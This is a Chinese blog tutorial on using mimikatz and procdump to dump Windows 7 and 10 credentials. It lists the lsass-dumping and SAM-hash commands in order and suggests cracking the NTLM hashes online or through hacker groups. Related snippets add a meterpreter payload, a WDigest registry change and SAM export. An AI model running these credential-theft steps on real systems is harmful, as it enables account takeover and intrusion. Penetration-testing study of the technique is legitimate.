mimikatz在win7和win10抓取密码

最新推荐文章于 2025-03-17 20:00:16 发布
最新推荐文章于 2025-03-17 20:00:16 发布
阅读量1.1k 收藏 9
点赞数 11
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ygylemon/article/details/144337624
版权

mimikatz是一款强大的轻量级调试工具,由法国人benjamin开发的,本意是用来个人测试,由于功能强大能直接读取明文密码,所以用来进行渗透测试。

首先低版本的windows可以直接抓取明文的密码,比如windows7,这里开一下虚拟机演示一下!

甚至说,把我域内管理员账号密码抓到了,其实也就一条命令的事儿
privilege::debug 先进行权限提升,然后sekurl::logonpasswords,就可以导出明文密码了。这都是基本操作,接下来演示一下如何在导不出明文密码的条件下,获取密码!

首先,需要下载一个procdump,是一款命令行工具,其主要目的是监视CPU峰值的应用程序,并产生了Dump转储文件来供开发人员分析。但由于其功能出色,可以用来进行渗透测试!

其次,要理解原理。Windows系统的密码存储在lsass和winlogon进程当中。

右键lsass.exe可以创建一个名为lsass.DMP的文件,这个文件包括windows存储的密码,密码存放位置 C:\windows\system32\config\SAM,但是在域内渗透中,需要提供管理员权限才能进行转存文件,此时需要用到procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

转存为lsass.dmp文件,再使用mimikatz就可以了

sekurlsa::minidump lsass.dmp  选择导出文件
sekurlsa::logonpasswords  导出密码信息 

但是windows7及以上的版本,可用通过其他技术手段,抓取到ntml值,去www.cmd5.com可以解开,依然可以获取到明文密码!下面展示的win10系统

privilege::debug 先进行权限提升
token::elevate  模拟SYSTEM令牌
lsadump::sam  获取hash值

然后去大佬群里求解,比如说这样!

然后就会有好心人帮你把密码解出来

ygylemon
关注
win10win2012之后系统的明文抓取方式
聚鼎安全
03-29 3731
原文地址:https://www.anquanke.com/post/id/175364 抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版win2012 R2 版本 工具下载:链接:https://pan.baidu.c...
mimikatz抓取windows明文密码cs与msf权限传递
m0_65540912的博客
05-25 822
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)这里注销就需要进行强制锁屏,因为是远程,锁屏需要借助脚本来进行,我这里就直接用电脑锁屏演示一下能否抓取明文。修改注册表之后,需注销用户,重新登录才能生效,才能抓取到明文。
内网渗透工具(Mimikatz
最新发布
尘玥的故事
03-17 861
能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,Mimikatz 的使用通常需要管理员权限,因为它需要访问系统的核心进程内存。注意:当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码
mimikatz抓取密码
G208_522的博客
10-26 5052
mimikatz抓取密码
mimkatz获取windows10明文密码
banliyaoguai的博客
05-31 2521
Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码mimikatz通过注入代码到操作系统的内存中,能够读取解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz先利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2979
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
密码抓取mimikatz
weixin_44300286的博客
03-12 2381
0x01、基本用法: CRYPTO::Certificates -列出/导出凭证。 PRIVILEGE::Debug -获得Debug权限 SEKURLSA::LogonPasswords -列出所有可用的提供者的凭据 TOKEN:List -列出系统中的所有令牌。 TOKEN::Elevate -假冒令牌。用于提升权限至SYSTEM权限(默认情况下) 0x02、加载方法 msf load mimikatz //加载mimikatz wdigest //列出所有可用的账号密码(与以下三个命令一样)
mimikatz_trunk-win7密码
02-26
标题 "mimikatz_trunk-win7密码" 暗示了我们正在处理与网络安全密码提取相关的主题,特别是针对Windows 7操作系统。Mimikatz是一款著名的开源工具,由法国安全研究员Benjamin Delpy开发,用于进行权限提升、密码...
cs与msf权限传递,与mimikatz抓取win2012明文密码
a15183865601的博客
06-26 253
通过修改注册表来让Wdigest Auth保存明文口令。8、传输会话到msf(选中-增加会话-选择监听器)3、配置监听,并设置监听端口为9999。7、cs新建监听,与msf一致。5、开启服务,下载并运行木马。6、进入msf并设置监听。这里发现抓取到的不是明文。之后重新登录再次抓取
cs与msf权限传递以及mimikatz抓取win2012明文密码
one piece的博客
06-01 691
Cobalt Strike是一个专业的渗透测试红队操作工具,广泛用于模拟高级持续性威胁攻击。它提供了丰富的功能,包括权限提升、横向移动、命令控制、后门植入等。CS的模块化设计强大的脚本支持,使其在网络攻击渗透测试中非常流行。早期的CS依赖Metasploit Framework框架,而现在Cobalt Strike是一个单独的平台,分为服务端客户端,客户端可以有多个,团队可以进行分布式合作操作。
服务器读取账号密码,WIN服务器得明文密码神器 mimikatz、WCE
weixin_31621945的博客
07-29 1448
一、mimikatz(自己亲试,可以在win7 x64下使用)昨天有朋友发了个法国佬写的神器叫mimikatz让我们看下还有一篇用这个神器直接从 lsass.exe里获取windows处于active状态账号明文密码的文章http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass自己...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
mimikatz获取系统密码
03-28
获取系统级别密码
密码抓取神器mimikatz
02-02
抓取整个windows系列的密码神器,必须在DOS命令提示符下以管理员身份运行;首先输入命令:privilege::debug 接着输入命令:sekurlsa::logonpasswords ,即可查看到相关信息
mimikatz实战域渗透抓取域控管理员密码
热门推荐
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
利用procdump+mimikatz读取windows系统中的密码
LUOBIKUN的博客
09-07 4034
利用procdump+mimikatz读取windows系统中的密码 今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。 工具我也都整理好了, 链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg 提取码:b1q6 procdump,可以将lsass进程的内存文件导出来; mimikatz,可以对导出的内存文件进行分析,从而获取密码。 1,
Win10系统中用mimikatz抓取明文密码
weixin_42558965的博客
03-22 4468
实验环境 :Windows10专业版 参考了网上的方法,发现大部分都是抄的 https://blog.youkuaiyun.com/netsec_steven/article/details/107257325 这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤 这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且
CSmsf的权限传递,利用mimikatz抓取win10明文密码
繁星
06-02 1422
安装CobaltStrike,浏览博主的上篇文章即可!!!这里我在自己的本机win11上执行了Client去连接kali中的Server端,直接执行.cmd文件即可!!!
cs与msf权限传递,以及mimikatz抓取win10明文密码
sgg236的博客
06-26 447
2,.生成木马 3.生成木马之后,将生成的木马程序拖到window2012,然后运行程序,发现目标已经上线 4.上线之后就可以对目标主机的操控 5.拿下权限将CS权限传递给msf1、建立监听器 2、在kali打开msf,开启msfconsole 2、调用 exploit/multi/handler 模块,将监听的ip地址与端口设置为在cs上建立监听保持一致。 3、然后进行传递 最后,返回msf就可以看到传递成功 msf拿权限1、在msfvenom生成木马 2、使用msfconsole启动Metasploi
mimikatz查看win10密码
05-13
请注意,使用Mimikatz获取未经授权的访问密码或尝试获取其他人的密码可能是非法的,这可能会导致法律后果。在此仅提供给安全研究人员或系统管理员进行安全审计测试的参考。 以下是使用Mimikatz获取Win10密码的步骤: 1. 首先,下载最新版本的Mimikatz工具,并解压缩到本地文件夹中。 2. 在管理员权限的命令提示符下运行Mimikatz。 3. 输入以下命令以加载Mimikatz安全支持提供程序: ``` mimikatz # privilege::debug ``` 4. 输入以下命令以导出Win10密码哈希值: ``` mimikatz # lsadump::sam ``` 5. 如果成功,将显示包含哈希值的输出。您可以使用在线哈希解密工具或其他密码破解工具来破解密码哈希值。 请注意,使用Mimikatz获取密码可能会触发反病毒软件的警报,因为它可以被用于恶意目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值